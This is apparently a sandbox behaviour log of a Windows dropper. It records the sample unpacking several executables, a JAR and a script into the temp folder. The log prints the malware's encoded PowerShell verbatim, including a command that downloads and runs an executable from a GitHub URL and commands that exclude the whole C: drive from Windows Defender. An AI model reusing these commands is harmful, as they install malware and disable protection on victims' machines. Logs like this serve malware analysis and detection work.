Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe"
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\HugeHack.jar"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe"
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe" ..
Source: unknown	Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe" ..
Source: unknown	Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe" ..
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe"	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\ere.js"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\HugeHack.jar"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\ere.js" /elevate	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe"
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"

Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
